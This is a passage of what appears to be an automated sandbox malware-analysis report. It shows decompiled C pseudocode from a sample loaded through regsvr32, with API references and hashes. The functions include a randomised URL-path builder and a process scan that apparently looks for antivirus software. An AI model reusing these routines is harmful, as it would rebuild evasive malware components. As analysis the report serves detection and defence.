                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00C86880,?,00000001,?,00000002,?,?,00C82417,?), ref: 00C83C61
                                                    • Part of subcall function 00C88A51: WaitForSingleObject.KERNEL32(00000000,?,?,?,00C83C81,?,00C83C81,?,?,?,?,?,00C83C81,?), ref: 00C88B2B
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                  • String ID:
                                                  • API String ID: 2559942907-0
                                                  • Opcode ID: 127f8d49c095f678e9310d36df0cd680961dd58e8e921034faf037a15d71c5cb
                                                  • Instruction ID: bfed032993ac6cf98cade2d7e45af1a526fa70633508b997d47e4488c9195a13
                                                  • Opcode Fuzzy Hash: 127f8d49c095f678e9310d36df0cd680961dd58e8e921034faf037a15d71c5cb
                                                  • Instruction Fuzzy Hash: 0C21D472D00259ABCB10BFE488C59EEB3BDAF44798B054529FA22F7140D730DF459BA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E00C8788B(unsigned int __eax, void* __ecx) {
                                                  				void* _v8;
                                                  				void* _v12;
                                                  				signed int _t21;
                                                  				signed short _t23;
                                                  				char* _t27;
                                                  				void* _t29;
                                                  				void* _t30;
                                                  				unsigned int _t33;
                                                  				void* _t37;
                                                  				unsigned int _t38;
                                                  				void* _t41;
                                                  				void* _t42;
                                                  				int _t45;
                                                  				void* _t46;
                                                  
                                                  				_t42 = __eax;
                                                  				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                  				_t38 = __eax;
                                                  				_t30 = RtlAllocateHeap( *0xc8d238, 0, (__eax >> 3) + __eax + 1);
                                                  				_v12 = _t30;
                                                  				if(_t30 != 0) {
                                                  					_v8 = _t42;
                                                  					do {
                                                  						_t33 = 0x18;
                                                  						if(_t38 <= _t33) {
                                                  							_t33 = _t38;
                                                  						}
                                                  						_t21 =  *0xc8d250; // 0xf9541ad9
                                                  						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                  						 *0xc8d250 = _t23;
                                                  						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                  						memcpy(_t30, _v8, _t45);
                                                  						_v8 = _v8 + _t45;
                                                  						_t27 = _t30 + _t45;
                                                  						_t38 = _t38 - _t45;
                                                  						_t46 = _t46 + 0xc;
                                                  						 *_t27 = 0x2f;
                                                  						_t13 = _t27 + 1; // 0x1
                                                  						_t30 = _t13;
                                                  					} while (_t38 > 8);
                                                  					memcpy(_t30, _v8, _t38 + 1);
                                                  				}
                                                  				return _v12;
                                                  			}

                                                  APIs
                                                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00C8839A,00000000,?,?,00C8A428,?,010A95B0), ref: 00C87896
                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 00C878AE
                                                  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,00C8839A,00000000,?,?,00C8A428,?,010A95B0), ref: 00C878F2
                                                  • memcpy.NTDLL(00000001,?,00000001), ref: 00C87913
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: memcpy$AllocateHeaplstrlen
                                                  • String ID:
                                                  • API String ID: 1819133394-0
                                                  • Opcode ID: 5e9142e1db7bbb34989c8894551a10a9ea55c3a423e8fa3c363c102f9928d110
                                                  • Instruction ID: ced82af0067707b28fc8ccd6fbbfceaa65850214aa37bcc66dcf2c6641e65ad6
                                                  • Opcode Fuzzy Hash: 5e9142e1db7bbb34989c8894551a10a9ea55c3a423e8fa3c363c102f9928d110
                                                  • Instruction Fuzzy Hash: E211C272A00214EFC7109B69DC88F9EBBAEEBC53A0B150266F50597290EB70DE04D7A4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 53%
                                                  			E00C87A9A(intOrPtr _a4, intOrPtr _a8) {
                                                  				char _v20;
                                                  				void* _t8;
                                                  				void* _t13;
                                                  				void* _t16;
                                                  				char* _t18;
                                                  				void* _t19;
                                                  
                                                  				_t19 = 0x27;
                                                  				_t1 =  &_v20; // 0x74666f53
                                                  				_t18 = 0;
                                                  				E00C86B43(_t8, _t1);
                                                  				_t16 = E00C82049(_t19);
                                                  				if(_t16 != 0) {
                                                  					_t3 =  &_v20; // 0x74666f53
                                                  					_t13 = E00C886D8(_t3, _t16, _a8);
                                                  					if(_a4 != 0) {
                                                  						__imp__(_a4);
                                                  						_t19 = _t13 + 0x27;
                                                  					}
                                                  					_t18 = E00C82049(_t19);
                                                  					if(_t18 != 0) {
                                                  						 *_t18 = 0;
                                                  						if(_a4 != 0) {
                                                  							__imp__(_t18, _a4);
                                                  						}
                                                  						__imp__(_t18, _t16);
                                                  					}
                                                  					E00C89039(_t16);
                                                  				}
                                                  				return _t18;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 00C82049: RtlAllocateHeap.NTDLL(00000000,00000000,00C87E50), ref: 00C82055
                                                    • Part of subcall function 00C886D8: wsprintfA.USER32 ref: 00C88734
                                                  • lstrlen.KERNEL32(00C823E9,00000000,00000000,00000027,00000005,00000000,00000000,00C896DA,74666F53,00000000,00C823E9,00C8D00C,?,00C823E9), ref: 00C87AD0
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00C87AF4
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00C87AFC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                  • String ID: Soft
                                                  • API String ID: 393707159-3753413193
                                                  • Opcode ID: 770ad192389903638c766a02b6f31d4a21ec526a987f95a1ca814cf25cd8cd99
                                                  • Instruction ID: 6ec6bbc70e11406a902d304f78e0d73602306a62eb74470f672b7cdff9b36e2d
                                                  • Opcode Fuzzy Hash: 770ad192389903638c766a02b6f31d4a21ec526a987f95a1ca814cf25cd8cd99
                                                  • Instruction Fuzzy Hash: 5601DF32100209A7C7127BA59C89AFF3B69EB8438DF144121F51555011EB35CA45E7A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E00C8757F() {
                                                  				char _v264;
                                                  				void* _v300;
                                                  				int _t8;
                                                  				intOrPtr _t9;
                                                  				int _t15;
                                                  				void* _t17;
                                                  
                                                  				_t15 = 0;
                                                  				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                  				if(_t17 != 0) {
                                                  					_t8 = Process32First(_t17,  &_v300);
                                                  					while(_t8 != 0) {
                                                  						_t9 =  *0xc8d27c; // 0x41a5a8
                                                  						_t2 = _t9 + 0xc8ee54; // 0x73617661
                                                  						_push( &_v264);
                                                  						if( *0xc8d0fc() != 0) {
                                                  							_t15 = 1;
                                                  						} else {
                                                  							_t8 = Process32Next(_t17,  &_v300);
                                                  							continue;
                                                  						}
                                                  						L7:
                                                  						CloseHandle(_t17);
                                                  						goto L8;
                                                  					}
                                                  					goto L7;
                                                  				}
                                                  				L8:
                                                  				return _t15;
                                                  			}

                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C8758F
                                                  • Process32First.KERNEL32(00000000,?), ref: 00C875A2
                                                  • Process32Next.KERNEL32(00000000,?), ref: 00C875CE
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C875DD
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: 9bcb6256dbc8a156fd240294f5a4560d02e31fa3c120d6a1010015965594686e
                                                  • Instruction ID: ad44033605451315a0e41a79648f935cb9554a3cfdcdba7f64dd88ee3780a650
                                                  • Opcode Fuzzy Hash: 9bcb6256dbc8a156fd240294f5a4560d02e31fa3c120d6a1010015965594686e
                                                  • Instruction Fuzzy Hash: 53F096326091255ADB20B7768D49FEB77ACDBC5759F100161F916D2040FB34CE498BAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00C87C61(void* __esi) {
                                                  				struct _SECURITY_ATTRIBUTES* _v4;
                                                  				void* _t8;
                                                  				void* _t10;
                                                  
                                                  				_v4 = 0;
                                                  				memset(__esi, 0, 0x38);
                                                  				_t8 = CreateEventA(0, 1, 0, 0);
                                                  				 *(__esi + 0x1c) = _t8;
                                                  				if(_t8 != 0) {
                                                  					_t10 = CreateEventA(0, 1, 1, 0);
                                                  					 *(__esi + 0x20) = _t10;
                                                  					if(_t10 == 0) {
                                                  						CloseHandle( *(__esi + 0x1c));
                                                  					} else {
                                                  						_v4 = 1;
                                                  					}
                                                  				}
                                                  				return _v4;
                                                  			}

                                                  Addresses: 0x00c87c6b, 0x00c87c6f, 0x00c87c84, 0x00c87c88, 0x00c87c8b, 0x00c87c91, 0x00c87c95, 0x00c87c98, 0x00c87ca3, 0x00c87c9a, 0x00c87c9a, 0x00c87c9a, 0x00c87c98, 0x00c87cb1

                                                  APIs
                                                  • memset.NTDLL ref: 00C87C6F
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 00C87C84
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00C87C91
                                                  • CloseHandle.KERNEL32(?), ref: 00C87CA3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: CreateEvent$CloseHandlememset
                                                  • String ID:
                                                  • API String ID: 2812548120-0
                                                  • Opcode ID: 3da83269e24ec6d80da6222ef7badf315901ce673573edb17629cfe12b252ea3
                                                  • Instruction ID: 7cd039a44d4e5c6c9bba2ab3de8ebb6cd7a67b5a6b0f4ad5c2bc136df3ca089c
                                                  • Opcode Fuzzy Hash: 3da83269e24ec6d80da6222ef7badf315901ce673573edb17629cfe12b252ea3
                                                  • Instruction Fuzzy Hash: F8F05EF4104308BFE7106F22DCC0D2BBBACFB852D9B218A3DF05282101D632E8099BB4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E005E1850() {
                                                  				void* _t1;
                                                  				long _t3;
                                                  				void* _t4;
                                                  				long _t5;
                                                  				void* _t6;
                                                  				intOrPtr _t8;
                                                  				void* _t12;
                                                  
                                                  				_t8 =  *0x5e4130;
                                                  				_t1 = CreateEventA(0, 1, 0, 0);
                                                  				 *0x5e413c = _t1;
                                                  				if(_t1 == 0) {
                                                  					return GetLastError();
                                                  				}
                                                  				_t3 = GetVersion();
                                                  				if(_t3 != 5) {
                                                  					L4:
                                                  					if(_t12 <= 0) {
                                                  						_t4 = 0x32;
                                                  						return _t4;
                                                  					} else {
                                                  						goto L5;
                                                  					}
                                                  				} else {
                                                  					if(_t3 > 0) {
                                                  						L5:
                                                  						 *0x5e412c = _t3;
                                                  						_t5 = GetCurrentProcessId();
                                                  						 *0x5e4128 = _t5;
                                                  						 *0x5e4130 = _t8;
                                                  						_t6 = OpenProcess(0x10047a, 0, _t5);
                                                  						 *0x5e4124 = _t6;
                                                  						if(_t6 == 0) {
                                                  							 *0x5e4124 =  *0x5e4124 | 0xffffffff;
                                                  						}
                                                  						return 0;
                                                  					} else {
                                                  						_t12 = _t3 - _t3;
                                                  						goto L4;
                                                  					}
                                                  				}
                                                  			}

                                                  Addresses: 0x005e1851, 0x005e185f, 0x005e1867, 0x005e186c, 0x005e18be, 0x005e18be, 0x005e186e, 0x005e1876, 0x005e187e, 0x005e187e, 0x005e18ba, 0x005e18bc, 0x00000000, 0x00000000, 0x00000000, 0x005e1878, 0x005e187a, 0x005e1880, 0x005e1880, 0x005e1885, 0x005e1893, 0x005e1898, 0x005e189e, 0x005e18a6, 0x005e18ab, 0x005e18ad, 0x005e18ad, 0x005e18b7, 0x005e187c, 0x005e187c, 0x00000000, 0x005e187c, 0x005e187a

                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,005E164B,751463F0), ref: 005E185F
                                                  • GetVersion.KERNEL32 ref: 005E186E
                                                  • GetCurrentProcessId.KERNEL32 ref: 005E1885
                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 005E189E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
                                                  • Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CreateCurrentEventOpenVersion
                                                  • String ID:
                                                  • API String ID: 845504543-0
                                                  • Opcode ID: eeb451900e402ef67cdd978023c692a9f8b798246efc076447d9263f15baafea
                                                  • Instruction ID: 5059b4cc2fb1cfd8fe89dd0a5c91c8a2abc454c790a3d130de01f2ae1f2fca80
                                                  • Opcode Fuzzy Hash: eeb451900e402ef67cdd978023c692a9f8b798246efc076447d9263f15baafea
                                                  • Instruction Fuzzy Hash: 07F08C31A442909BEB6CAF6ABC8DB943FA0F735722F000255E1C4DE1A0D370458AEF1C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 50%
                                                  			E00C875E9(void** __esi) {
                                                  				char* _v0;
                                                  				intOrPtr _t4;
                                                  				intOrPtr _t6;
                                                  				void* _t8;
                                                  				intOrPtr _t11;
                                                  				void* _t12;
                                                  				void** _t14;
                                                  
                                                  				_t14 = __esi;
                                                  				_t4 =  *0xc8d32c; // 0x10a95b0
                                                  				__imp__(_t4 + 0x40);
                                                  				while(1) {
                                                  					_t6 =  *0xc8d32c; // 0x10a95b0
                                                  					_t1 = _t6 + 0x58; // 0x0
                                                  					if( *_t1 == 0) {
                                                  						break;
                                                  					}
                                                  					Sleep(0xa);
                                                  				}
                                                  				_t8 =  *_t14;
                                                  				if(_t8 != 0 && _t8 != 0xc8d030) {
                                                  					HeapFree( *0xc8d238, 0, _t8);
                                                  				}
                                                  				_t14[1] = E00C894A9(_v0, _t14);
                                                  				_t11 =  *0xc8d32c; // 0x10a95b0
                                                  				_t12 = _t11 + 0x40;
                                                  				__imp__(_t12);
                                                  				return _t12;
                                                  			}

                                                  Addresses: 0x00c875e9, 0x00c875e9, 0x00c875f2, 0x00c87602, 0x00c87602, 0x00c87607, 0x00c8760c, 0x00000000, 0x00000000, 0x00c875fc, 0x00c875fc, 0x00c8760e, 0x00c87612, 0x00c87624, 0x00c87624, 0x00c87634, 0x00c87637, 0x00c8763c, 0x00c87640, 0x00c87646

                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(010A9570), ref: 00C875F2
                                                  • Sleep.KERNEL32(0000000A,?,00C823DE), ref: 00C875FC
                                                  • HeapFree.KERNEL32(00000000,00000000,?,00C823DE), ref: 00C87624
                                                  • RtlLeaveCriticalSection.NTDLL(010A9570), ref: 00C87640
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                  • String ID:
                                                  • API String ID: 58946197-0
                                                  • Opcode ID: 12f0de81a780255d3ebd43c045d88a1d25a94b97e70c14d174ff8130d296143c
                                                  • Instruction ID: 6e1606e4df2e8eaf9ce47326b5e62771e5d62deee95aeeaf246b6603b2ca7fd7
                                                  • Opcode Fuzzy Hash: 12f0de81a780255d3ebd43c045d88a1d25a94b97e70c14d174ff8130d296143c
                                                  • Instruction Fuzzy Hash: CDF0D470604641DBE714AB69DC89F1A77E8EF14785B148419F813D72B1E730ED41DB2E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00C8970F() {
                                                  				void* _t1;
                                                  				intOrPtr _t5;
                                                  				void* _t6;
                                                  				void* _t7;
                                                  				void* _t11;
                                                  
                                                  				_t1 =  *0xc8d26c; // 0x2c8
                                                  				if(_t1 == 0) {
                                                  					L8:
                                                  					return 0;
                                                  				}
                                                  				SetEvent(_t1);
                                                  				_t11 = 0x7fffffff;
                                                  				while(1) {
                                                  					SleepEx(0x64, 1);
                                                  					_t5 =  *0xc8d2b8; // 0x0
                                                  					if(_t5 == 0) {
                                                  						break;
                                                  					}
                                                  					_t11 = _t11 - 0x64;
                                                  					if(_t11 > 0) {
                                                  						continue;
                                                  					}
                                                  					break;
                                                  				}
                                                  				_t6 =  *0xc8d26c; // 0x2c8
                                                  				if(_t6 != 0) {
                                                  					CloseHandle(_t6);
                                                  				}
                                                  				_t7 =  *0xc8d238; // 0xcb0000
                                                  				if(_t7 != 0) {
                                                  					HeapDestroy(_t7);
                                                  				}
                                                  				goto L8;
                                                  			}

                                                  Addresses: 0x00c8970f, 0x00c89716, 0x00c89760, 0x00c89762, 0x00c89762, 0x00c8971a, 0x00c89720, 0x00c89725, 0x00c89729, 0x00c8972f, 0x00c89736, 0x00000000, 0x00000000, 0x00c89738, 0x00c8973d, 0x00000000, 0x00000000, 0x00000000, 0x00c8973d, 0x00c8973f, 0x00c89747, 0x00c8974a, 0x00c8974a, 0x00c89750, 0x00c89757, 0x00c8975a, 0x00c8975a, 0x00000000

                                                  APIs
                                                  • SetEvent.KERNEL32(000002C8,00000001,00C88099), ref: 00C8971A
                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 00C89729
                                                  • CloseHandle.KERNEL32(000002C8), ref: 00C8974A
                                                  • HeapDestroy.KERNEL32(00CB0000), ref: 00C8975A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: CloseDestroyEventHandleHeapSleep
                                                  • String ID:
                                                  • API String ID: 4109453060-0
                                                  • Opcode ID: d0f1b13a06600737d153ad2f08349fbc7468c9a1b27d794e0a2208e755fabf6d
                                                  • Instruction ID: 82c3e72d36cebe90d7c02c3c6570fab848581d13cc1a0a1a929bf88e5610c2d3
                                                  • Opcode Fuzzy Hash: d0f1b13a06600737d153ad2f08349fbc7468c9a1b27d794e0a2208e755fabf6d
                                                  • Instruction Fuzzy Hash: 50F03035715311DBD7207F75AD88B2A37A8EB007A5B080610B827E72E0DB34DD40E76C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 37%
                                                  			E00C8A5D6() {
                                                  				void* _v0;
                                                  				void** _t3;
                                                  				void** _t5;
                                                  				void** _t7;
                                                  				void** _t8;
                                                  				void* _t10;
                                                  
                                                  				_t3 =  *0xc8d32c; // 0x10a95b0
                                                  				__imp__( &(_t3[0x10]));
                                                  				while(1) {
                                                  					_t5 =  *0xc8d32c; // 0x10a95b0
                                                  					_t1 =  &(_t5[0x16]); // 0x0
                                                  					if( *_t1 == 0) {
                                                  						break;
                                                  					}
                                                  					Sleep(0xa);
                                                  				}
                                                  				_t7 =  *0xc8d32c; // 0x10a95b0
                                                  				_t10 =  *_t7;
                                                  				if(_t10 != 0 && _t10 != 0xc8e836) {
                                                  					HeapFree( *0xc8d238, 0, _t10);
                                                  					_t7 =  *0xc8d32c; // 0x10a95b0
                                                  				}
                                                  				 *_t7 = _v0;
                                                  				_t8 =  &(_t7[0x10]);
                                                  				__imp__(_t8);
                                                  				return _t8;
                                                  			}

                                                  Addresses: 0x00c8a5d6, 0x00c8a5df, 0x00c8a5ef, 0x00c8a5ef, 0x00c8a5f4, 0x00c8a5f9, 0x00000000, 0x00000000, 0x00c8a5e9, 0x00c8a5e9, 0x00c8a5fb, 0x00c8a600, 0x00c8a604, 0x00c8a617, 0x00c8a61d, 0x00c8a61d, 0x00c8a626, 0x00c8a628, 0x00c8a62c, 0x00c8a632

                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(010A9570), ref: 00C8A5DF
                                                  • Sleep.KERNEL32(0000000A,?,00C823DE), ref: 00C8A5E9
                                                  • HeapFree.KERNEL32(00000000,?,?,00C823DE), ref: 00C8A617
                                                  • RtlLeaveCriticalSection.NTDLL(010A9570), ref: 00C8A62C
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                  • String ID:
                                                  • API String ID: 58946197-0
                                                  • Opcode ID: 6dcb9bb48af6cd4940b425256a46e17a87c76320efc4ed1d8e5c4e5d7fa8019b
                                                  • Instruction ID: 03116afdaf1316a538503ec83ff7f50ab96119f3185a1d45a4dc7c430ee63a57
                                                  • Opcode Fuzzy Hash: 6dcb9bb48af6cd4940b425256a46e17a87c76320efc4ed1d8e5c4e5d7fa8019b
                                                  • Instruction Fuzzy Hash: 81F06274600140DBE718AB65DC99B1D77B5EB08746B44801AF913DB2B0D730EC50DB2E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 58%
                                                  			E00C87F27(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                  				intOrPtr* _v8;
                                                  				void* _t17;
                                                  				intOrPtr* _t22;
                                                  				void* _t27;
                                                  				char* _t30;
                                                  				void* _t33;
                                                  				void* _t34;
                                                  				void* _t36;
                                                  				void* _t37;
                                                  				void* _t39;
                                                  				int _t42;
                                                  
                                                  				_t17 = __eax;
                                                  				_t37 = 0;
                                                  				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                  				_t2 = _t17 + 1; // 0x1
                                                  				_t28 = _t2;
                                                  				_t34 = E00C82049(_t2);
                                                  				if(_t34 != 0) {
                                                  					_t30 = E00C82049(_t28);
                                                  					if(_t30 == 0) {
                                                  						E00C89039(_t34);
                                                  					} else {
                                                  						_t39 = _a4;
                                                  						_t22 = E00C8A911(_t39);
                                                  						_v8 = _t22;
                                                  						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                  							_a4 = _t39;
                                                  						} else {
                                                  							_t26 = _t22 + 2;
                                                  							_a4 = _t22 + 2;
                                                  							_t22 = E00C8A911(_t26);
                                                  							_v8 = _t22;
                                                  						}
                                                  						if(_t22 == 0) {
                                                  							__imp__(_t34, _a4);
                                                  							 *_t30 = 0x2f;
                                                  							 *((char*)(_t30 + 1)) = 0;
                                                  						} else {
                                                  							_t42 = _t22 - _a4;
                                                  							memcpy(_t34, _a4, _t42);
                                                  							 *((char*)(_t34 + _t42)) = 0;
                                                  							__imp__(_t30, _v8);
                                                  						}
                                                  						 *_a8 = _t34;
                                                  						_t37 = 1;
                                                  						 *_a12 = _t30;
                                                  					}
                                                  				}
                                                  				return _t37;
                                                  			}

                                                  APIs
                                                  • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,00C815A4,?,?,?,?,00000102,00C811DA,?,?,00000000), ref: 00C87F33
                                                    • Part of subcall function 00C82049: RtlAllocateHeap.NTDLL(00000000,00000000,00C87E50), ref: 00C82055
                                                    • Part of subcall function 00C8A911: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00C87F61,00000000,00000001,00000001,?,?,00C815A4,?,?,?,?,00000102), ref: 00C8A91F
                                                    • Part of subcall function 00C8A911: StrChrA.SHLWAPI(?,0000003F,?,?,00C815A4,?,?,?,?,00000102,00C811DA,?,?,00000000,00000000), ref: 00C8A929
                                                  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00C815A4,?,?,?,?,00000102,00C811DA,?), ref: 00C87F91
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00C87FA1
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00C87FAD
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 3767559652-0
                                                  • Opcode ID: 8a307576ccab7714eeb605a91993aed881541a9e5e6802968d6a60ff4c74e86e
                                                  • Instruction ID: b9c9f2e82e7b69746d113170dae0f3d719cf7e08cc8c995a1e875e4e1b516a58
                                                  • Opcode Fuzzy Hash: 8a307576ccab7714eeb605a91993aed881541a9e5e6802968d6a60ff4c74e86e
                                                  • Instruction Fuzzy Hash: C121C072408225EBCB02AFE6DC84BAFBFA99F45388B254055FA049B211E735CA0097A4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00C87CB8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                  				void* _v8;
                                                  				void* _t18;
                                                  				int _t25;
                                                  				int _t29;
                                                  				int _t34;
                                                  
                                                  				_t29 = lstrlenW(_a4);
                                                  				_t25 = lstrlenW(_a8);
                                                  				_t18 = E00C82049(_t25 + _t29 + _t25 + _t29 + 2);
                                                  				_v8 = _t18;
                                                  				if(_t18 != 0) {
                                                  					_t34 = _t29 + _t29;
                                                  					memcpy(_t18, _a4, _t34);
